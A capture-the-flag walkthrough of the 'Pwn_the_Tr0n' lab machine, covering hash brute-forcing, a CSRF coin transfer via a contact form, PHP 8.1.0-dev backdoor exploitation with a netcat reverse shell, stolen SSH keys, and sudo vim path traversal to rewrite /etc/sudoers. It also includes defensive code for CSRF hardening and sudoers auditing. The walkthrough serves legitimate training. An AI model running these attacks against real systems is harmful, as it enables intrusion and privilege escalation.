Pwn_the_Tr0n Walk-through

Hello Guys, in this write-up I'm going to walk through the Pwn_the_Tr0n machine.

Machine Level: Medium

Box Made By: Sachin Sharma, Manjunathan

The first thing is scanning. Find the IP address of the machine using netdiscover:

netdiscover -p

(-p is passive mode: netdiscover only listens for ARP traffic, so it can take a while to see the target. netdiscover -r <network>/24 actively probes the range if you are in a hurry.)

After finding the IP, start the usual process: a basic nmap scan.

nmap -A -sV <IP_addr>

(-A already turns on version detection, so -sV is redundant here; it does no harm.)

The scan shows two open ports: SSH and HTTP. Trying to log in via SSH asks for a password, so look for another way in. Visit the IP of the machine in a browser. You'll find a web page with some info about the concept of the machine, but no hints. So go with the usual method: fuzzing.

dirb http://<ip_addr>

It shows some directories. All of them return 403 Forbidden except one named Travel, and visiting that directory turns up some juicy info, including a hash.

(screenshot: the /Travel directory)

Here we found the following:

- a hash
- an encrypted message
- the format the message takes once the encryption key is decrypted
- a string, @decepticon-base, that looks like a username

Try to crack the hash. No use: it either takes too long or does not work with a plain wordlist. So move on and collect other hints. @decepticon-base looks like a username, so search for it everywhere. Google dorks turned up nothing, so use a dedicated tool: I used sherlock, and it found a GitHub user named decepticon-base.

Check the GitHub user. In the projects folder there is a folder named iacon, but its contents show only <<<< DELETED >>>>.

So try to recover what was there anyway: use the Wayback Machine to fetch the old copy of the file. From it we get the hint /iacon_code/(capital_of_country)/Latitude_{}.{}-Longitude_{}.{}.txt. So let's make a wordlist of the capitals of all countries. That still leaves the last part, Latitude_{}.{}-Longitude_{}.{}.txt: we need to find what goes in place of each "{}". Since we know the structure of the plaintext, the hash from /Travel can be cracked by brute-forcing that structure, so let's write a script for it.

(screenshot: the capitals wordlist)
(screenshot: the code recovered from the Wayback Machine)
(screenshot: md5.py)
(screenshot: output of the script)

We already know the code, the capitals and the decrypted message format, so the script only has to fill in the numbers. Cracking the hash with the script gives the path R3LIC-1337/Tokyo/Latitude_95.37-Longitude_95.37.txt, which contains our first flag and a hint to the next one.

(screenshot: Flag-1)
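The brute-force the walkthrough describes, written out as an added example (this is not the author's md5.py): it builds every path the recovered template can produce from a capitals wordlist and candidate coordinate digits, hashes each with MD5 and stops at the one matching the hash from /Travel. The capitals list here is a constructed subset, the numeric ranges for the "{}" placeholders are parameters because the walkthrough never states them, and the two-digit fractional part is an assumption taken from the final path.

```python
import hashlib
import itertools

# Constructed sample of the hand-made capitals wordlist (the real one
# covered every country).
CAPITALS = ["Paris", "Berlin", "Tokyo", "Lima"]

# Path template recovered from the Wayback Machine copy of the deleted
# iacon project. The two-digit zero-padded fraction is an assumption
# based on the cracked path Latitude_95.37-Longitude_95.37.txt.
TEMPLATE = "{code}/{capital}/Latitude_{a}.{b:02d}-Longitude_{c}.{d:02d}.txt"


def md5_hex(text):
    """MD5 of a string as lowercase hex, the form the hash on /Travel has."""
    return hashlib.md5(text.encode()).hexdigest()


def candidates(code, capitals, int_range, frac_range):
    """Yield every path the template can produce.

    int_range / frac_range are the values tried for the integer and
    fractional placeholders. The walkthrough does not say what the real
    ranges were, so they are left as parameters (assumption).
    """
    for capital in capitals:
        for a, c in itertools.product(int_range, repeat=2):
            for b, d in itertools.product(frac_range, repeat=2):
                yield TEMPLATE.format(code=code, capital=capital,
                                      a=a, b=b, c=c, d=d)


def crack_md5(target_hex, code, capitals,
              int_range=range(100), frac_range=range(100)):
    """Return the template path whose MD5 equals target_hex, else None.

    With the default ranges this is 100**4 hashes per capital, so narrow
    them whenever you know anything about the coordinates.
    """
    target_hex = target_hex.lower()
    for path in candidates(code, capitals, int_range, frac_range):
        if md5_hex(path) == target_hex:
            return path
    return None


if __name__ == "__main__":
    # Demo with a constructed target: hash a known path, then recover it.
    known = "R3LIC-1337/Tokyo/Latitude_95.37-Longitude_95.37.txt"
    target = md5_hex(known)
    found = crack_md5(target, "R3LIC-1337", CAPITALS,
                      int_range=range(90, 100), frac_range=range(30, 40))
    print(found)
```

Generating the plaintext structurally and hashing it is far cheaper than throwing a generic wordlist at the hash, which is why the earlier cracking attempt went nowhere: no wordlist contains a path like this.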

Okay, now on to the next part: visit the URL given in the flag, <Ip_addr>/W4RSHIP_Sh0P.php. It takes you into a shop.

Check the full page for hints. After going through every part we have the following:

- we need to buy the secret item to get the next hint
- there is a login panel, and non-users need to create an account
- the secret item costs 9999 coins

Okay, try to buy the secret item. It says LOGIN FIRST and redirects you to the login panel, so create an account there. After creating one you land on a dashboard; try to buy the item again, and this time it returns "Not enough Coins". So let's try other methods. In the dashboard there is "Transfer Coins to a Friend in need?", but it returns "Request cannot be entertained" every time. The About section gives another hint: "Only admin can transfer coins". Note the money transfer URL.

It looks like "http://<Ip_addr>/W4RSHIP_Sh0P_transfer.php?to=cool&amount=9999&from=cool". Tricks like changing "from" to admin do not work, and buying the other two items fails the same way. To see what is going on, check the source of the money transfer page: there is no action behind the transfer at all, so spending more time on that page is pointless. What do we do now?

Check other possible ways to transfer money. The shop page has a contact-us form; its source shows it has some working functionality. Try to request a transfer through the form. No use: it just returns "thanks for contacting us".

In the About section we saw "only Admin can transfer Energon coins between accounts", and the page source gives the usernames of the three in-charge persons; the admin's username is "admin_boss". So try each of the three usernames in the form's username field with amount 9999. Still no use, it keeps returning "Thank you for CONtacting us." Now think out of the box: per the hint, only the admin can send the transfer request, and we already have the request URL from the transfer page:

http://<IP_Addr>/W4RSHIP_Sh0P_transfer.php?to=user&amount=9999&from=user

Send the request through the contact-us page, CSRF style: instead of a message we send the transfer request, and whoever reads the contact form on the server side ends up issuing it. Since only the admin can send money requests, put admin_boss in the username field and the request URL in the message:

http://<IP_Addr>/W4RSHIP_Sh0P_transfer.php?to=user&amount=9999&from=admin_boss

This time it said "almost there" but still did not transfer the money. So the contact-us page is indeed the CSRF vector; what remains is the "from" account. Change the "from" username one by one to the in-charge persons found in the source.

With from=lord_starscream the money is transferred. The request is:

http://<IP_Addr>/W4RSHIP_Sh0P_transfer.php?to=user&amount=9999&from=lord_starscream

That's it, the amount is transferred.

(screenshot: amount transferred)
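To make the security point concrete, here is an added model of the transfer endpoint as the walkthrough observed it, next to a hardened version. This is a reconstruction written for this write-up, not the shop's PHP: the balances, the helper names and the exact admin-side handling of the contact form are assumptions. The vulnerable model reproduces what was seen: the transfer is a GET URL, the debited account comes from the "from" query parameter, and the only check is that whoever issues the request is an admin, so a link planted in the contact form runs with the admin's authority. The hardened version takes the debited account from the session, requires a POST with a per-session CSRF token, and therefore cannot be driven by a planted link.

```python
import secrets
from urllib.parse import parse_qs, urlparse


def sample_accounts():
    """Constructed balances for the demo. The walkthrough only shows that
    the fresh account cannot afford the 9999-coin secret item."""
    return {
        "admin_boss": {"admin": True, "coins": 0},
        "lord_starscream": {"admin": False, "coins": 50000},
        "user": {"admin": False, "coins": 0},
    }


def transfer_vulnerable(url, requester, accounts):
    """Model of W4RSHIP_Sh0P_transfer.php as observed (assumption):
    a GET request whose 'from' parameter names the debited account, with
    the requester's admin flag as the only authorisation check."""
    q = parse_qs(urlparse(url).query)
    try:
        src, dst, amount = q["from"][0], q["to"][0], int(q["amount"][0])
    except (KeyError, ValueError):
        return "Request cannot be entertained"
    if not accounts.get(requester, {}).get("admin"):
        return "Request cannot be entertained"
    if src not in accounts or dst not in accounts or accounts[src]["coins"] < amount:
        return "Not enough Coins"
    accounts[src]["coins"] -= amount
    accounts[dst]["coins"] += amount
    return "Transferred"


def admin_follows_link(url, accounts):
    """Assumed server-side handling of the contact form: the admin reads
    the message and visits the link in it, which is exactly what makes a
    GET transfer link a CSRF attack."""
    if "W4RSHIP_Sh0P_transfer.php" not in url:
        return "Thank you for CONtacting us."
    return transfer_vulnerable(url, "admin_boss", accounts)


def new_session(user):
    """A logged-in session carrying a random per-session CSRF token."""
    return {"user": user, "csrf": secrets.token_hex(16)}


def transfer_hardened(method, form, session, accounts):
    """The fix: state changes only via POST, the form must carry the
    session's CSRF token, and the debited account is the session user.
    Any 'from' field sent by the client is ignored."""
    if method != "POST":
        return "Forbidden"
    if not secrets.compare_digest(form.get("csrf", ""), session["csrf"]):
        return "Forbidden"
    src = session["user"]
    try:
        dst, amount = form["to"], int(form["amount"])
    except (KeyError, ValueError):
        return "Bad request"
    if amount <= 0 or dst not in accounts or accounts[src]["coins"] < amount:
        return "Not enough Coins"
    accounts[src]["coins"] -= amount
    accounts[dst]["coins"] += amount
    return "Transferred"


if __name__ == "__main__":
    acc = sample_accounts()
    link = "http://10.0.0.5/W4RSHIP_Sh0P_transfer.php?to=user&amount=9999&from=lord_starscream"
    print(admin_follows_link(link, acc), acc["user"]["coins"])  # the attack
    sess = new_session("admin_boss")
    print(transfer_hardened("GET", {"to": "user", "amount": "9999"}, sess, sample_accounts()))
```

The lesson for builders is the same one the box teaches: a sensitive action reachable by a bare GET and parameterised by a client-supplied identity is a CSRF target for anyone who can get a privileged user to load a URL, and a contact form read by staff is exactly such a channel.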

Now you can buy the item and get the next hint, which contains credentials:

Purchase Successful!
Megatron Login Panel URL: /M3G4TR0N_SUPR3M3/login.php
Username = L0RD_M3G4Tr0N
Password = freakishlylongpasswordforl0gin

Now sign out of the shop and log in at the given login panel URL with those credentials. That's it, you're logged in and the flag is there.

(screenshot: Flag-2)

Check the source, storage and network tabs too, and intercept the request and response. One thing stands out: the response header "X-Powered-By: PHP/8.1.0-dev". This is not the released PHP 8.1.0; the 8.1.0-dev build distributed from the compromised php-src git server in 2021 carried a backdoor that evaluates PHP code sent in a User-Agentt request header, giving remote code execution. Searching the internet for an exploit turns up two:

https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/backdoor_php_8.1.0-dev.py

https://github.com/flast101/php-8.1.0-dev-backdoor-rce/blob/main/revshell_php_8.1.0-dev.py

Check both exploits. The reverse shell exploit works fine with a netcat listener.

Netcat listener: nc -lvnp <port_number>

Reverse shell exploit: python3 reverse_shell_code.py <URL of the page> <IP_Addr> <port_number>

That's it, we have a shell.

Check for flag files. In the home directory there are two folders, megatr0n and soundwave. Looking through both, we find Flag3.txt in soundwave's directory, but permission is denied.

(screenshot: access denied)

So check for other files. While looking around we find SSH keys that we can read.

(screenshot: .ssh)

Check the identity file (id_rsa); it may contain something useful. Great, we have soundwave's private SSH key. Search for any other data as well.

There is nothing more to do from this shell. What we have is soundwave's SSH key, and the nmap scan showed SSH open, so copy the key to our machine and log in with it. (ssh refuses a key file readable by others, so chmod 600 ssh_key.pem first.)

ssh -i ssh_key.pem soundwave@<IP_Addr>

We get a proper shell; read Flag3.txt for the third flag.

(screenshot: Flag-3)

The last thing is the root flag, which needs privilege escalation. Start by checking what soundwave is allowed to run.

(screenshot: sudo -l output)

Trying to log in as root with sudo -i is denied. sudo -l shows that soundwave has no general root rights; the only rule is running vim as root, without a password, on files under /var/Decepticon/. It is basic logic, but you rarely see it even in HTB.

So let's "access a file under /var/Decepticon/". The wildcard in the sudo rule is matched against the argument string as typed, and nothing canonicalises the path, so a .. traversal still satisfies the pattern:

sudo vim /var/Decepticon/../../etc/sudoers

Oh cool, it works!

Now disable the password requirement for soundwave by adding the following line to the file:

soundwave ALL=(ALL) NOPASSWD:ALL

and comment out the original, restricted rule:

soundwave ALL= NOPASSWD: /usr/bin/vim /var/Decepticon/*

Two caveats worth knowing. First, plain vim does not run visudo's syntax check, so double-check the line before saving; a syntax error in /etc/sudoers can lock sudo for everyone. Second, the traversal is not even necessary: vim is an editor with shell escapes, so :!/bin/bash from inside any sudo vim session already gives a root shell. Either way, the rule as written is broken.

Now get a root shell with:

sudo -i

Boooooooom! Got the root shell!!!💥💥💥

That's it, we have root. Find the root flag and read it, and you have the root flag too.
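A small audit script, added here as an example and not part of the original write-up, that finds sudo rules of the kind this box uses. It parses the common single-line sudoers form, answers whether a given command line satisfies a rule the way sudo would (the argument string is matched with fnmatch without FNM_PATHNAME, so "*" matches across "/" and ".." is never resolved), and for every wildcard argument tries to climb out of the intended directory to /etc/sudoers. The sudoers fragment is constructed to mirror the soundwave rule; the parser is deliberately minimal and the helper names are assumptions.

```python
import fnmatch
import posixpath
import re

# Constructed sudoers fragment mirroring what sudo -l showed for soundwave.
SUDOERS = """
Defaults env_reset
root ALL=(ALL:ALL) ALL
soundwave ALL= NOPASSWD: /usr/bin/vim /var/Decepticon/*
"""

_RHS = re.compile(r"^(\([^)]*\)\s*)?((?:[A-Z]+:\s*)*)(.*)$")


def parse_rules(text):
    """Parse 'user host=(runas) TAG: cmd, cmd' lines (minimal: no aliases)."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults") or "=" not in line:
            continue
        lhs, rhs = line.split("=", 1)
        m = _RHS.match(rhs.strip())
        runas = (m.group(1) or "").strip("() \t") or "root"
        tags = [t.strip() for t in m.group(2).split(":") if t.strip()]
        for spec in m.group(3).split(","):
            rules.append({"user": lhs.split()[0], "runas": runas,
                          "tags": tags, "spec": spec.strip()})
    return rules


def rule_permits(spec, argv):
    """Would sudo accept argv under this command spec?

    The command path must match exactly; a spec with no arguments allows
    any arguments; \"\" allows none; otherwise the argument string is
    fnmatch'ed as a whole, which is what lets '..' through.
    """
    if spec == "ALL":
        return True
    spec_cmd, _, spec_args = spec.partition(" ")
    spec_args = spec_args.strip()
    if spec_cmd != argv[0]:
        return False
    if not spec_args:
        return True
    if spec_args == '""':
        return len(argv) == 1
    return fnmatch.fnmatchcase(" ".join(argv[1:]), spec_args)


def escapes(spec):
    """If spec's wildcard argument can be steered to /etc/sudoers with
    '..', return the argv that does it, else None."""
    spec_cmd, _, spec_args = spec.partition(" ")
    spec_args = spec_args.strip()
    if "*" not in spec_args:
        return None
    prefix = spec_args.split("*", 1)[0]          # literal part before '*'
    depth = len([c for c in prefix.split("/") if c])
    probe = prefix + "../" * depth + "etc/sudoers"
    if fnmatch.fnmatchcase(probe, spec_args) and posixpath.normpath(probe) == "/etc/sudoers":
        return [spec_cmd, probe]
    return None


def audit(text):
    """Return (user, runas, argv) for every rule that escapes its directory."""
    findings = []
    for r in parse_rules(text):
        argv = escapes(r["spec"])
        if argv:
            findings.append((r["user"], r["runas"], argv))
    return findings


if __name__ == "__main__":
    for user, runas, argv in audit(SUDOERS):
        print("%s can run as %s: sudo %s" % (user, runas, " ".join(argv)))
```

The fix on the defender's side is to drop the wildcard (list the exact files, or give the user a dedicated helper script owned by root) and never to hand out an editor, pager or interpreter through sudo, since those have shell escapes regardless of which file they are pointed at.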

Thank you guys! Give us your support, and we'll meet in another write-up.